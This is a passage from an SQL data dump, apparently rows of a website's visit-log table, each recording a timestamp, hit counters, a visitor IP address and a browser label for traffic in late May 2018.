,'54.36.148.25','other'),(252259,1527707818,1,1,0,0,'54.36.149.57','other'),(252260,1527708547,2,2,0,0,'216.244.66.241','other'),(252261,1527708761,1,1,0,0,'77.111.244.55','chrome'),(252262,1527708848,1,1,0,0,'95.163.255.92','other'),(252263,1527709243,1,1,0,0,'207.46.13.169','other'),(252264,1527709365,1,1,0,0,'54.36.149.50','other'),(252265,1527709781,1,1,0,0,'54.36.148.76','other'),(252266,1527709947,1,1,0,0,'216.244.66.241','other'),(252267,1527710137,1,1,0,0,'54.36.148.56','other'),(252268,1527710226,1,1,0,0,'87.250.224.46','other'),(252269,1527710518,1,1,0,0,'54.36.148.97','other'),(252270,1527710526,1,1,0,0,'54.36.148.95','other'),(252271,1527711449,1,1,0,0,'8.29.198.26','other'),(252272,1527711479,1,1,0,0,'95.84.198.118','msie'),(252273,1527711632,2,2,0,0,'91.196.178.167','chrome'),(252274,1527711725,1,1,0,0,'54.36.148.235','other'),(252275,1527711738,2,2,0,0,'54.36.148.50','other'),(252276,1527711761,2,2,0,0,'46.201.112.213','chrome'),(252277,1527711919,1,1,0,0,'95.163.255.9','other'),(252278,1527712568,1,1,0,0,'54.36.148.67','other'),(252279,1527712581,1,1,0,0,'178.154.171.88','other'),(252280,1527713793,1,1,0,0,'54.36.148.188','other'),(252281,1527714114,1,1,0,0,'54.36.149.67','other'),(252282,1527714264,1,1,0,0,'91.196.178.47','chrome'),(252283,1527714340,1,1,0,0,'95.163.255.96','other'),(252284,1527714388,1,1,0,0,'54.36.148.151','other'),(252285,1527714402,3,3,0,0,'188.163.2.30','other'),(252286,1527714817,1,1,0,0,'54.36.148.128','other'),(252287,1527715072,1,1,0,0,'193.178.187.228','other'),(252288,1527715323,2,2,0,0,'188.163.2.30','other'),(252289,1527715391,1,1,0,0,'95.163.255.7','other'),(252290,1527715956,1,1,0,0,'157.55.39.69','other'),(252291,1527716151,1,1,0,0,'95.163.255.99','other'),(252292,1527716219,1,1,0,0,'216.244.66.241','other'),(252293,1527716766,1,1,0,0,'54.36.148.56','other'),(252294,1527716804,1,1,0,0,'54.36.148.103','other'),(252295,1527716907,1,1,0,0,'54.36.149.34','other'),(252296,1527717024,1,1,0,0,'8.29.198.27','other'),(252297,1527717147,2,2,0,0,'141.8.142.74','other'),(252298,1527717379,1,1,0,0,'217.69.134.183','other'),(252299,1527717723,1,1,0,0,'54.36.148.50','other'),(252300,1527718566,1,1,0,0,'141.8.142.74','other'),(252301,1527718603,1,1,0,0,'91.196.178.132','other'),(252302,1527718761,1,1,0,0,'54.36.148.151','other'),(252303,1527718795,1,1,0,0,'178.154.171.88','other'),(252304,1527719044,1,1,0,0,'54.36.148.78','other'),(252305,1527719155,1,1,0,0,'54.36.148.113','other'),(252306,1527719377,1,1,0,0,'157.55.39.190','other'),(252307,1527719896,1,1,0,0,'54.36.148.11','other'),(252308,1527719968,1,1,0,0,'54.36.148.216','other'),(252309,1527720937,3,3,0,0,'216.244.66.241','other'),(252310,1527721481,3,3,0,0,'141.8.142.74','other'),(252311,1527721670,1,1,0,0,'95.163.255.99','other'),(252312,1527721739,1,1,0,0,'54.36.148.77','other'),(252313,1527722301,1,1,0,0,'8.29.198.25','other'),(252314,1527722390,1,1,0,0,'141.8.142.74','other'),(252315,1527722488,1,1,0,0,'54.36.149.60','other'),(252316,1527722575,1,1,0,0,'54.36.148.59','other'),(252317,1527722815,1,1,0,0,'54.36.148.236','other'),(252318,1527723120,2,2,0,0,'54.36.149.14','other'),(252319,1527723127,1,1,0,0,'54.36.149.64','other'),(252320,1527723245,1,1,0,0,'54.36.148.17','other'),(252321,1527723295,1,0,1,0,'66.249.64.30',''),(252322,1527723663,1,1,0,0,'54.36.149.58','other'),(252323,1527724121,1,1,0,0,'54.36.148.121','other'),(252324,1527724635,1,1,0,0,'54.36.148.16','other'),(252325,1527724734,1,1,0,0,'54.36.148.199','other'),(252326,1527724748,1,1,0,0,'95.163.255.7','other'),(252327,1527724891,1,1,0,0,'54.36.148.156','other'),(252328,1527725068,1,1,0,0,'54.36.149.62','other'),(252329,1527725360,1,1,0,0,'54.36.148.252','other'),(252330,1527725709,1,1,0,0,'54.36.148.191','other'),(252331,1527726001,1,1,0,0,'54.36.149.30','other'),(252332,1527726208,1,1,0,0,'54.36.149.63','other'),(252333,1527726226,1,1,0,0,'212.124.114.242','firefox'),(252334,1527726414,1,1,0,0,'54.36.149.32','other'),(252335,1527727272,1,1,0,0,'141.8.142.74','other'),(252336,1527727583,2,2,0,0,'216.244.66.241','other'),(252337,1527727712,1,1,0,0,'54.36.149.47','other'),(252338,1527727856,1,1,0,0,'54.36.148.68','other'),(252339,1527727860,1,1,0,0,'8.29.198.25','other'),(252340,1527728031,1,1,0,0,'54.36.148.85','other'),(252341,1527728303,1,1,0,0,'54.36.148.251','other'),(252342,1527728506,1,1,0,0,'95.163.255.92','other'),(252343,1527728700,1,1,0,0,'54.36.148.72','other'),(252344,1527729021,2,2,0,0,'216.244.66.241','other'),(252345,1527729441,1,1,0,0,'178.154.171.88','other'),(252346,1527730235,4,4,0,0,'216.244.66.241','other'),(252347,1527730603,1,1,0,0,'141.8.142.74','other'),(252348,1527730810,1,1,0,0,'54.36.148.240','other'),(252349,1527730898,1,1,0,0,'54.36.148.201','other'),(252350,1527731201,1,1,0,0,'54.36.148.195','other'),(252351,1527731522,1,1,0,0,'178.154.171.88','other'),(252352,1527731649,4,4,0,0,'216.244.66.241','other'),(252353,1527731685,1,1,0,0,'54.36.148.170','other'),(252354,1527731901,1,1,0,0,'141.8.142.74','other'),(252355,1527731912,1,1,0,0,'54.36.148.10','other'),(252356,1527732452,1,1,0,0,'54.36.148.68','other'),(252357,1527732960,1,1,0,0,'54.36.148.135','other'),(252358,1527733161,1,1,0,0,'8.29.198.25','other'),(252359,1527733180,1,1,0,0,'54.36.148.85','other'),(252360,1527733395,1,1,0,0,'54.36.148.30','other'),(252361,1527734101,1,1,0,0,'207.46.13.169','other'),(252362,1527734353,2,2,0,0,'216.244.66.241','other'),(252363,1527734609,1,1,0,0,'54.36.149.41','other'),(252364,1527734660,1,0,1,0,'66.249.64.28',''),(252365,1527734950,29,29,0,0,'142.44.159.96','other'),(252366,1527735260,1,1,0,0,'54.36.149.81','other'),(252367,1527735443,1,1,0,0,'216.244.66.241','other'),(252368,1527735628,1,1,0,0,'54.36.149.77','other'),(252369,1527735941,2,2,0,0,'141.8.142.74','other'),(252370,1527737511,1,1,0,0,'54.36.148.132','other'),(252371,1527738708,1,1,0,0,'8.29.198.25','other'),(252372,1527738722,1,1,0,0,'54.36.149.50','other'),(252373,1527739708,1,1,0,0,'54.36.148.92','other'),(252374,1527739774,1,1,0,0,'54.36.148.217','other'),(252375,1527739851,1,1,0,0,'54.36.148.11','other'),(252376,1527739938,1,1,0,0,'216.244.66.241','other'),(252377,1527740416,13,13,0,0,'148.251.244.137','other'),(252378,1527740653,1,1,0,0,'54.36.148.41','other'),(252379,1527740735,1,1,0,0,'54.36.148.67','other'),(252380,1527740768,1,1,0,0,'54.36.148.89','other'),(252381,1527740999,1,1,0,0,'54.36.149.4','other'),(252382,1527741001,1,1,0,0,'54.36.148.46','other'),(252383,1527741138,1,1,0,0,'54.36.148.220','other'),(252384,1527741790,1,1,0,0,'54.36.148.35','other'),(252385,1527741807,1,1,0,0,'188.230.43.254','other'),(252386,1527741826,1,1,0,0,'91.196.178.134','firefox'),(252387,1527741884,1,1,0,0,'54.36.149.0','other'),(252388,1527742114,2,2,0,0,'91.196.178.167','chrome'),(252389,1527742432,1,1,0,0,'54.36.149.53','other'),(252390,1527742713,1,1,0,0,'54.36.149.4','other'),(252391,1527742781,1,1,0,0,'54.36.148.218','other'),(252392,1527742863,1,1,0,0,'216.244.66.241','other'),(252393,1527743060,1,1,0,0,'54.36.148.186','other'),(252394,1527743073,1,1,0,0,'54.36.148.55','other'),(252395,1527743084,1,1,0,0,'54.36.149.39','other'),(252396,1527743087,1,1,0,0,'54.36.149.87','other'),(252397,1527743690,1,1,0,0,'54.36.148.99','other'),(252398,1527743937,1,1,0,0,'54.36.149.21','other'),(252399,1527744018,1,1,0,0,'8.29.198.26','other'),(252400,1527744150,1,1,0,0,'216.244.66.241','other'),(252401,1527744240,2,2,0,0,'78.111.185.41','chrome'),(252402,1527744403,1,1,0,0,'54.36.148.189','other'),(252403,1527744478,1,1,0,0,'37.55.77.44','chrome'),(252404,1527744690,1,1,0,0,'54.36.148.170','other'),(252405,1527744860,1,1,0,0,'54.36.149.42','other'),(252406,1527745502,1,1,0,0,'54.36.148.159','other'),(252407,1527745705,1,1,0,0,'54.36.148.220','other'),(252408,1527745875,1,1,0,0,'54.36.149.31','other'),(252409,1527746178,1,1,0,0,'176.113.209.232','chrome'),(252410,1527746188,1,1,0,0,'54.36.148.61','other'),(252411,1527746709,1,1,0,0,'54.36.148.107','other'),(252412,1527747239,1,1,0,0,'54.36.148.149','other'),(252413,1527747274,1,1,0,0,'95.134.74.240','chrome'),(252414,1527747548,1,1,0,0,'54.36.149.63','other'),(252415,1527748102,1,1,0,0,'178.154.171.88','other'),(252417,1527748159,2,2,0,0,'91.196.178.169','chrome'),(252418,1527748177,2,2,0,0,'178.95.92.13','chrome'),(252419,1527748224,1,1,0,0,'54.36.149.27','other'),(252420,1527748449,1,1,0,0,'54.36.148.249','other'),(252421,1527748769,1,1,0,0,'54.36.148.188','other'),(252422,1527749217,1,1,0,0,'54.36.149.38','other'),(252423,1527749546,1,1,0,0,'54.36.149.99','other'),(252424,1527749556,1,1,0,0,'8.29.198.25','other'),(252425,1527749976,1,1,0,0,'54.36.149.16','other'),(252426,1527750167,1,1,0,0,'54.36.149.105','other'),(252427,1527750410,1,1,0,0,'54.36.148.69','other'),(252428,1527750413,2,2,0,0,'91.196.178.69','chrome'),(252429,1527750959,1,1,0,0,'54.36.148.206','other'),(252430,1527751068,1,1,0,0,'54.36.148.138','other'),(252431,1527751070,1,1,0,0,'188.163.2.30','other'),(252432,1527751088,2,2,0,0,'91.196.178.161','chrome'),(252433,1527751354,1,1,0,0,'54.165.59.7','other'),(252434,1527751909,1,1,0,0,'180.76.15.144','other'),(252435,1527751938,1,1,0,0,'54.36.148.72','other'),(252436,1527752099,1,1,0,0,'157.55.39.190','other'),(252437,1527752218,1,1,0,0,'54.36.148.152','other'),(252438,1527752237,1,1,0,0,'92.112.221.217','chrome'),(252439,1527752563,1,1,0,0,'54.36.148.105','other'),(252440,1527752873,1,1,0,0,'54.36.148.198','other'),(252441,1527752886,2,2,0,0,'91.196.178.165','chrome'),(252442,1527753018,1,1,0,0,'54.36.148.185','other'),(252443,1527753423,1,0,1,0,'66.249.64.29',''),(252444,1527753829,2,2,0,0,'91.196.178.80','chrome'),(252445,1527753870,1,1,0,0,'188.163.2.30','other'),(252446,1527753884,1,1,0,0,'66.249.70.25','chrome'),(252447,1527753897,1,1,0,0,'66.249.64.28','chrome'),(252448,1527754000,1,1,0,0,'54.36.148.237','other'),(252449,1527754168,2,2,0,0,'199.58.86.209','other'),(252450,1527754647,1,1,0,0,'37.73.131.54','chrome'),(252451,1527754652,1,1,0,0,'54.36.148.45','other'),(252452,1527754800,1,1,0,0,'95.163.255.94','other'),(252453,1527754866,1,1,0,0,'8.29.198.27','other'),(252454,1527754924,1,1,0,0,'54.36.149.27','other'),(252455,1527755003,2,2,0,0,'91.196.178.80','chrome'),(252456,1527755058,1,1,0,0,'31.13.114.251','other'),(252457,1527755064,1,1,0,0,'31.13.114.72','other'),(252458,1527755088,1,1,0,0,'173.252.127.14','other'),(252459,1527755241,1,0,1,0,'66.249.64.30',''),(252460,1527755335,1,1,0,0,'54.36.149.60','other'),(252461,1527755375,1,1,0,0,'91.196.178.136','firefox'),(252462,1527755431,1,1,0,0,'91.196.178.162','chrome'),(252463,1527755510,1,1,0,0,'54.36.148.195','other'),(252464,1527755540,1,1,0,0,'46.133.51.85','chrome'),(252465,1527755810,1,1,0,0,'54.36.148.65','other'),(252466,1527755990,1,1,0,0,'91.196.178.102','chrome'),(252467,1527756964,1,1,0,0,'176.113.209.232','chrome'),(252468,1527757228,2,2,0,0,'91.196.177.46','chrome'),(252469,1527757305,1,1,0,0,'54.36.149.80','other'),(252470,1527757599,1,1,0,0,'54.36.149.57','other'),(252471,1527757691,1,1,0,0,'54.36.149.97','other'),(252472,1527758043,1,1,0,0,'216.244.66.241','other'),(252473,1527758189,1,1,0,0,'54.36.148.197','other'),(252474,1527758538,1,0,1,0,'66.249.70.25',''),(252475,1527758912,1,1,0,0,'54.36.148.118','other'),(252476,1527758986,1,1,0,0,'54.36.148.210','other'),(252477,1527759113,1,0,1,0,'66.249.64.29',''),(252478,1527759425,1,1,0,0,'93.170.116.37','chrome'),(252479,1527759652,1,1,0,0,'54.36.148.184','other'),(252480,1527759727,1,0,1,0,'66.249.64.30',''),(252481,1527759758,1,1,0,0,'213.108.45.162','chrome'),(252482,1527759774,1,1,0,0,'77.91.157.97','chrome'),(252483,1527759808,1,1,0,0,'80.93.187.57','firefox'),(252484,1527759886,1,1,0,0,'46.174.125.28','chrome'),(252485,1527759978,1,1,0,0,'54.36.148.48','other'),(252486,1527760036,1,1,0,0,'141.8.142.74','other'),(252487,1527760127,1,1,0,0,'54.36.149.83','other'),(252488,1527760208,1,1,0,0,'13.56.232.243','chrome'),(252489,1527760394,1,1,0,0,'8.29.198.27','other'),(252490,1527760635,1,1,0,0,'54.36.148.79','other'),(252491,1527760839,1,0,1,0,'66.249.64.29',''),(252492,1527761038,2,2,0,0,'213.108.45.162','chrome'),(252493,1527761583,1,1,0,0,'188.163.2.30','other'),(252494,1527762119,1,1,0,0,'178.154.171.88','other'),(252495,1527762204,1,1,0,0,'54.36.148.52','other'),(252496,1527762253,1,1,0,0,'193.19.119.38','firefox'),(252497,1527762279,1,1,0,0,'141.8.142.74','other'),(252498,1527762287,1,1,0,0,'54.36.148.107','other'),(252499,1527762627,1,1,0,0,'185.158.113.148','firefox'),(252500,1527762792,1,1,0,0,'54.36.148.83','other'),(252501,1527763126,1,1,0,0,'54.36.148.252','other'),(252502,1527763714,1,1,0,0,'46.185.73.63','chrome'),(252503,1527763727,1,1,0,0,'54.36.149.59','other'),(252504,1527763842,1,1,0,0,'54.36.148.136','other'),(252505,1527763853,1,1,0,0,'54.36.148.75','other'),(252506,1527764442,1,1,0,0,'54.36.148.145','other'),(252507,1527764611,3,3,0,0,'188.163.2.30','other'),(252508,1527764655,1,1,0,0,'54.36.148.150','other'),(252509,1527764807,1,1,0,0,'216.244.66.241','other'),(252510,1527764910,1,1,0,0,'46.133.183.117','chrome'),(252511,1527764986,1,1,0,0,'107.167.107.106','other'),(252512,1527765065,1,1,0,0,'54.36.148.169','other'),(252513,1527765724,1,1,0,0,'8.29.198.27','other'),(252514,1527766125,1,1,0,0,'216.244.66.241','other'),(252515,1527766386,1,1,0,0,'54.36.148.105','other'),(252516,1527766390,2,2,0,0,'46.219.77.169','chrome'),(252517,1527766785,1,1,0,0,'195.68.216.88','chrome'),(252518,1527767242,1,1,0,0,'54.36.149.41','other'),(252519,1527767258,1,1,0,0,'216.244.66.241','other'),(252520,1527767305,1,1,0,0,'54.36.149.93','other'),(252521,1527767427,1,1,0,0,'54.36.148.168','other'),(252522,1527767512,1,1,0,0,'54.36.148.122','other'),(252523,1527767534,1,1,0,0,'54.36.148.82','other'),(252524,1527767662,1,1,0,0,'54.36.149.14','other'),(252525,1527767810,1,1,0,0,'54.36.148.208','other'),(252526,1527767904,1,1,0,0,'95.133.199.144','opera'),(252527,1527768419,2,2,0,0,'95.158.3.62','chrome'),(252528,1527768644,1,1,0,0,'216.244.66.241','other'),(252529,1527768762,2,2,0,0,'91.196.178.80','chrome'),(252530,1527769031,1,1,0,0,'62.205.134.182','other'),(252531,1527769225,1,1,0,0,'54.36.148.154','other'),(252532,1527769382,1,1,0,0,'54.36.148.180','other'),(252533,1527769433,1,1,0,0,'77.91.157.97','chrome'),(252534,1527770184,2,2,0,0,'178.238.224.129','other'),(252535,1527770363,1,1,0,0,'77.91.157.97','chrome'),(252536,1527770403,1,1,0,0,'54.36.148.174','other'),(252537,1527770406,1,0,1,0,'66.249.64.28',''),(252538,1527770554,1,1,0,0,'62.205.134.182','other'),(252539,1527770608,1,1,0,0,'54.36.148.29','other'),(252540,1527770731,1,1,0,0,'188.163.2.30','other'),(252541,1527770740,1,1,0,0,'54.36.148.134','other'),(252542,1527770768,2,2,0,0,'216.244.66.241','other'),(252543,1527771120,1,1,0,0,'64.246.161.30','firefox'),(252544,1527771139,1,1,0,0,'54.36.148.88','other'),(252545,1527771144,1,1,0,0,'77.120.63.34','chrome'),(252546,1527771165,1,1,0,0,'54.36.149.98','other'),(252547,1527771237,1,1,0,0,'8.29.198.27','other'),(252548,1527771376,1,1,0,0,'95.163.255.93','other'),(252549,1527771847,2,2,0,0,'144.76.14.153','other'),(252550,1527772014,1,1,0,0,'62.205.134.182','other'),(252551,1527772017,1,1,0,0,'54.36.148.101','other'),(252552,1527772088,1,1,0,0,'54.36.148.68','other'),(252553,1527772093,3,3,0,0,'91.196.178.80','chrome'),(252554,1527772473,1,1,0,0,'47.96.233.90','other'),(252555,1527772518,1,1,0,0,'173.252.124.54','other'),(252556,1527772527,1,1,0,0,'188.230.43.254','other'),(252557,1527772531,2,2,0,0,'91.196.178.167','chrome'),(252558,1527772544,1,1,0,0,'92.112.125.243','chrome'),(252559,1527772554,1,1,0,0,'54.36.148.52','other'),(252560,1527772618,1,1,0,0,'120.79.186.194','other'),(252561,1527772665,1,1,0,0,'54.36.148.218','other'),(252562,1527772727,1,1,0,0,'54.36.148.105','other'),(252563,1527772814,1,1,0,0,'54.36.148.255','other'),(252564,1527772953,1,1,0,0,'54.36.148.106','other'),(252565,1527773324,1,1,0,0,'91.196.158.133','chrome'),(252566,1527773418,1,1,0,0,'54.36.149.86','other'),(252567,1527773745,2,2,0,0,'216.244.66.241','other'),(252568,1527774074,1,1,0,0,'54.36.148.94','other'),(252569,1527774242,1,1,0,0,'54.36.149.102','other'),(252570,1527774513,1,1,0,0,'178.93.237.135','chrome'),(252571,1527774541,1,1,0,0,'87.250.224.46','other'),(252572,1527774544,1,1,0,0,'62.205.134.182','other'),(252573,1527774652,2,2,0,0,'54.36.149.82','other'),(252574,1527774806,1,1,0,0,'54.36.148.190','other'),(252575,1527774895,1,1,0,0,'188.230.43.254','other'),(252576,1527775188,1,1,0,0,'216.244.66.241','other'),(252577,1527775235,1,1,0,0,'40.77.167.107','other'),(252578,1527775448,2,2,0,0,'37.55.77.44','chrome'),(252579,1527775800,1,1,0,0,'54.36.148.225','other'),(252580,1527776445,1,1,0,0,'62.205.134.182','msie'),(252581,1527776501,1,1,0,0,'216.244.66.241','other'),(252582,1527776565,1,1,0,0,'8.29.198.25','other'),(252583,1527777294,1,1,0,0,'188.230.43.254','other'),(252584,1527777357,1,1,0,0,'54.36.149.49','other'),(252585,1527777506,1,1,0,0,'178.92.254.71','chrome'),(252586,1527777987,1,1,0,0,'216.244.66.241','other'),(252587,1527778016,1,1,0,0,'54.36.148.135','other'),(252588,1527778288,1,1,0,0,'141.8.142.74','other'),(252589,1527778401,1,1,0,0,'54.36.148.80','other'),(252590,1527778525,1,0,1,0,'66.249.64.30',''),(252591,1527778855,3,3,0,0,'91.196.178.67','chrome'),(252592,1527779237,1,1,0,0,'77.111.247.59','chrome'),(252593,1527779662,1,1,0,0,'54.36.149.97','other'),(252594,1527779695,1,1,0,0,'188.230.43.254','other'),(252595,1527781034,1,1,0,0,'54.36.148.28','other'),(252596,1527781163,1,1,0,0,'54.36.149.56','other'),(252597,1527781377,1,1,0,0,'157.55.39.158','other'),(252598,1527781631,1,1,0,0,'46.211.132.23','chrome'),(252599,1527782073,1,1,0,0,'8.29.198.26','other'),(252600,1527782155,1,0,1,0,'66.249.70.27',''),(252601,1527782242,1,1,0,0,'66.220.151.180','other'),(252602,1527782335,1,1,0,0,'54.36.149.44','other'),(252603,1527782522,1,1,0,0,'54.36.149.39','other'),(252604,1527782734,1,1,0,0,'54.36.148.109','other'),(252605,1527782766,2,2,0,0,'141.8.142.74','other'),(252606,1527783151,1,1,0,0,'54.36.148.115','other'),(252607,1527783185,1,1,0,0,'54.36.149.5','other'),(252608,1527783799,1,1,0,0,'178.154.171.88','other'),(252609,1527783984,1,1,0,0,'54.36.149.21','other'),(252610,1527784003,1,1,0,0,'54.36.148.158','other'),(252611,1527784328,1,1,0,0,'54.36.148.181','other'),(252612,1527784509,1,1,0,0,'54.36.148.162','other'),(252613,1527784616,1,1,0,0,'54.36.149.1','other'),(252614,1527786627,1,1,0,0,'54.36.148.164','other'),(252615,1527787010,1,1,0,0,'54.36.149.28','other'),(252616,1527787175,1,1,0,0,'54.36.148.75','other'),(252617,1527787310,1,1,0,0,'66.249.64.30','chrome'),(252618,1527787381,1,1,0,0,'54.36.148.78','other'),(252619,1527787415,1,1,0,0,'8.29.198.27','other'),(252620,1527787426,1,1,0,0,'91.196.177.63','other'),(252621,1527787709,1,1,0,0,'54.36.148.28','other'),(252622,1527788517,1,1,0,0,'54.36.149.83','other'),(252623,1527789561,1,1,0,0,'54.36.148.76','other'),(252624,1527790401,1,1,0,0,'157.55.39.158','other'),(252625,1527790468,1,1,0,0,'54.36.148.174','other'),(252626,1527790513,1,1,0,0,'54.36.148.22','other'),(252627,1527790566,1,1,0,0,'54.36.148.253','other'),(252628,1527790725,1,1,0,0,'54.36.148.225','other'),(252629,1527791511,1,1,0,0,'54.36.148.135','other'),(252630,1527791882,1,0,1,0,'66.249.64.29',''),(252631,1527792016,1,1,0,0,'54.36.148.188','other'),(252632,1527792260,1,1,0,0,'54.36.148.130','other'),(252633,1527792530,1,1,0,0,'54.36.148.85','other'),(252634,1527792915,1,1,0,0,'8.29.198.27','other'),(252635,1527792961,1,1,0,0,'193.194.127.222','firefox'),(252636,1527793929,1,1,0,0,'54.36.148.180','other'),(252637,1527794175,1,1,0,0,'54.36.149.17','other'),(252638,1527794474,1,1,0,0,'54.36.148.242','other'),(252639,1527794579,1,1,0,0,'54.36.148.88','other'),(252640,1527794581,1,1,0,0,'54.36.148.110','other'),(252641,1527794616,1,1,0,0,'54.36.148.142','other'),(252642,1527794724,1,1,0,0,'54.36.148.209','other'),(252643,1527794747,1,1,0,0,'37.55.65.60','chrome'),(252644,1527794891,1,1,0,0,'54.36.148.136','other'),(252645,1527795124,1,1,0,0,'91.196.178.71','firefox'),(252646,1527795374,1,1,0,0,'91.209.51.22','other'),(252647,1527795763,3,3,0,0,'216.244.66.241','other'),(252648,1527795905,1,0,1,0,'66.249.64.30',''),(252649,1527796204,1,1,0,0,'144.76.120.197','other'),(252650,1527796328,1,1,0,0,'54.36.148.117','other'),(252651,1527796427,2,2,0,0,'91.196.178.51','chrome'),(252652,1527796523,1,1,0,0,'40.77.167.2','other'),(252653,1527796641,1,1,0,0,'54.36.148.107','other'),(252654,1527796884,1,1,0,0,'91.196.178.38','chrome'),(252655,1527797044,1,1,0,0,'54.36.148.179','other'),(252656,1527797684,1,1,0,0,'54.36.148.44','other'),(252657,1527797803,1,1,0,0,'91.196.178.38','chrome'),(252658,1527798268,1,1,0,0,'8.29.198.26','other'),(252659,1527798517,1,1,0,0,'178.154.171.88','other'),(252660,1527799036,1,1,0,0,'54.36.148.218','other'),(252661,1527799043,1,1,0,0,'54.36.148.41','other'),(252662,1527799846,1,1,0,0,'54.36.148.174','other'),(252663,1527800165,1,1,0,0,'54.36.148.82','other'),(252664,1527800396,1,1,0,0,'141.8.142.74','other'),(252665,1527800452,1,1,0,0,'54.36.148.221','other'),(252666,1527800589,1,1,0,0,'54.36.148.237','other'),(252667,1527800750,1,1,0,0,'216.244.66.241','other'),(252668,1527801444,2,2,0,0,'54.165.59.7','other'),(252669,1527802128,1,1,0,0,'54.36.149.100','other'),(252670,1527802639,1,1,0,0,'54.36.148.38','other'),(252671,1527802743,1,1,0,0,'54.36.148.232','other'),(252672,1527802778,1,1,0,0,'216.244.66.241','other'),(252673,1527803091,1,1,0,0,'54.36.148.209','other'),(252674,1527803671,1,1,0,0,'54.36.148.17','other'),(252675,1527803764,1,1,0,0,'8.29.198.25','other'),(252676,1527803881,1,1,0,0,'54.36.148.30','other'),(252677,1527803885,1,1,0,0,'54.36.148.47','other'),(252678,1527804259,1,1,0,0,'141.8.142.74','other'),(252679,1527805364,1,1,0,0,'54.36.149.97','other'),(252681,1527805764,1,1,0,0,'54.36.148.207','other'),(252682,1527806140,1,1,0,0,'213.108.41.120','other'),(252683,1527806261,1,1,0,0,'54.36.149.18','other'),(252684,1527806491,1,1,0,0,'54.36.148.132','other'),(252685,1527806590,1,1,0,0,'54.36.148.64','other'),(252686,1527806735,1,1,0,0,'216.244.66.241','other'),(252687,1527807086,1,1,0,0,'54.36.148.222','other'),(252688,1527807350,1,1,0,0,'193.106.30.99','firefox'),(252689,1527807572,1,1,0,0,'54.36.148.81','other'),(252690,1527807590,1,1,0,0,'54.36.148.176','other'),(252691,1527807778,1,0,1,0,'66.249.70.29',''),(252692,1527807945,1,1,0,0,'54.36.148.216','other'),(252693,1527808481,1,0,1,0,'66.249.64.28',''),(252694,1527808589,2,2,0,0,'141.8.142.74','other'),(252695,1527808879,1,1,0,0,'54.36.148.251','other'),(252696,1527809060,1,0,1,0,'66.249.64.30',''),(252697,1527809119,1,1,0,0,'8.29.198.27','other'),(252698,1527809611,1,1,0,0,'95.163.255.4','other'),(252699,1527809651,1,1,0,0,'54.36.148.230','other'),(252700,1527809798,1,1,0,0,'178.159.37.73','firefox'),(252701,1527810591,1,1,0,0,'54.36.148.140','other'),(252702,1527810625,1,0,1,0,'66.249.64.30',''),(252703,1527810883,1,1,0,0,'141.8.142.74','other'),(252704,1527811261,1,1,0,0,'54.36.148.226','other'),(252705,1527811374,1,1,0,0,'40.77.167.45','other'),(252706,1527811598,1,1,0,0,'54.36.148.41','other'),(252707,1527811927,1,1,0,0,'144.76.71.176','other'),(252708,1527812284,1,1,0,0,'54.36.148.38','other'),(252709,1527812556,1,0,1,0,'66.249.64.29',''),(252710,1527812757,1,1,0,0,'54.36.148.138','other'),(252711,1527813003,2,2,0,0,'216.244.66.241','other'),(252712,1527813252,1,1,0,0,'54.36.148.123','other'),(252713,1527813268,1,1,0,0,'54.36.148.213','other'),(252714,1527813821,1,1,0,0,'54.36.148.91','other'),(252715,1527813961,1,1,0,0,'54.36.148.105','other'),(252716,1527813996,1,1,0,0,'87.250.224.46','other'),(252717,1527814052,1,0,1,0,'66.249.64.30',''),(252718,1527814126,1,0,1,0,'66.249.64.28',''),(252719,1527814599,1,1,0,0,'8.29.198.27','other'),(252720,1527814751,1,1,0,0,'54.36.148.55','other'),(252721,1527814882,1,1,0,0,'54.36.149.14','other'),(252722,1527815110,1,1,0,0,'54.36.148.17','other'),(252723,1527815197,1,1,0,0,'37.9.113.182','other'),(252724,1527815479,1,1,0,0,'54.36.148.99','other'),(252725,1527815546,1,0,1,0,'66.249.64.15',''),(252726,1527816417,2,0,2,0,'66.249.64.28',''),(252727,1527816736,1,1,0,0,'54.36.149.100','other'),(252728,1527816744,1,1,0,0,'54.36.149.54','other'),(252729,1527816761,1,0,1,0,'66.249.64.30',''),(252730,1527816960,2,2,0,0,'141.8.142.74','other'),(252731,1527817541,1,1,0,0,'54.36.149.96','other'),(252732,1527817695,1,1,0,0,'54.36.148.156','other'),(252733,1527817781,1,1,0,0,'46.118.155.165','chrome'),(252734,1527817930,1,1,0,0,'54.36.149.1','other'),(252735,1527818544,2,2,0,0,'216.244.66.241','other'),(252736,1527818586,1,1,0,0,'54.36.148.24','other'),(252737,1527818629,1,1,0,0,'54.36.149.66','other'),(252738,1527818959,1,1,0,0,'66.249.64.30','chrome'),(252739,1527819207,1,0,1,0,'66.249.64.28',''),(252740,1527819604,1,1,0,0,'54.36.148.214','other'),(252741,1527819714,1,1,0,0,'54.36.148.175','other'),(252742,1527819953,1,1,0,0,'8.29.198.25','other'),(252743,1527820003,1,1,0,0,'54.36.149.74','other'),(252744,1527820050,1,1,0,0,'54.36.148.129','other'),(252745,1527820311,1,1,0,0,'87.250.224.46','other'),(252746,1527820392,1,0,1,0,'66.249.64.29',''),(252747,1527820498,1,1,0,0,'54.36.149.103','other'),(252748,1527821321,1,1,0,0,'54.36.149.19','other'),(252749,1527821793,1,1,0,0,'95.163.255.93','other'),(252750,1527822228,1,1,0,0,'54.36.148.95','other'),(252751,1527822257,2,0,2,0,'66.249.70.27',''),(252752,1527822876,1,1,0,0,'54.36.148.236','other'),(252753,1527823036,1,0,1,0,'66.249.64.28',''),(252754,1527823155,1,0,1,0,'66.249.64.30',''),(252755,1527823777,1,1,0,0,'95.135.184.95','chrome'),(252756,1527824061,11,11,0,0,'23.237.4.26','other'),(252757,1527824149,1,1,0,0,'54.36.149.9','other'),(252758,1527824397,1,1,0,0,'54.36.149.107','other'),(252759,1527824743,1,1,0,0,'216.244.66.241','other'),(252760,1527825254,1,1,0,0,'54.36.149.70','other'),(252761,1527825282,1,1,0,0,'54.36.148.144','other'),(252762,1527825443,1,1,0,0,'8.29.198.25','other'),(252763,1527826226,1,1,0,0,'54.36.148.19','other'),(252764,1527826279,1,1,0,0,'141.8.142.74','other'),(252765,1527826514,1,1,0,0,'54.36.148.220','other'),(252766,1527826649,1,1,0,0,'207.46.13.85','other'),(252767,1527827053,1,1,0,0,'54.36.148.124','other'),(252768,1527827259,1,1,0,0,'91.196.178.131','firefox'),(252769,1527827399,1,1,0,0,'178.154.171.88','other'),(252770,1527827410,1,1,0,0,'54.36.149.5','other'),(252771,1527827652,1,1,0,0,'54.36.148.252','other'),(252772,1527827684,1,1,0,0,'54.36.148.237','other'),(252773,1527827795,1,0,1,0,'66.249.64.